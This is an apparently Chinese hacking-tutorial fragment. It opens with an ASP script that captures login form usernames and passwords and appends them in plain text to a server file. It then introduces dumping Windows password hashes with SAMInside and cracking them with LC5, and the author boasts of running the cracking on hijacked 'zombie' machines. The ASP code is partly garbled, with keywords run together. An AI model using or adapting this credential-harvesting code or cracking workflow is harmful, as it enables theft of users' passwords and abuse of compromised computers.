<%
dimName,password,fso,file
Name=Request.Form("UserName")
Password=Request.Form("Password")
ConstForReading=1,ForWriting=2,ForAppending=8
Setfso=Server.CreateObject("Scripting.FileSystemObject")
Constpath="存放文件的路径"
setfile=fso.opentextfile(path,ForAppending,TRUE)
file.write(Name)&""
file.write(Password)&"||"
file.close
setfile=nothing
setfso=nothing
%>
下面我主要讲一下用saminside抓取hash,用lc5跑抓取出来的hash,
其实使用很简单,先用saminside抓取系统的hash,如下图,打开
好,下面我们就点开始键进行破解了,我一般是放在肉机上去跑的,哈哈....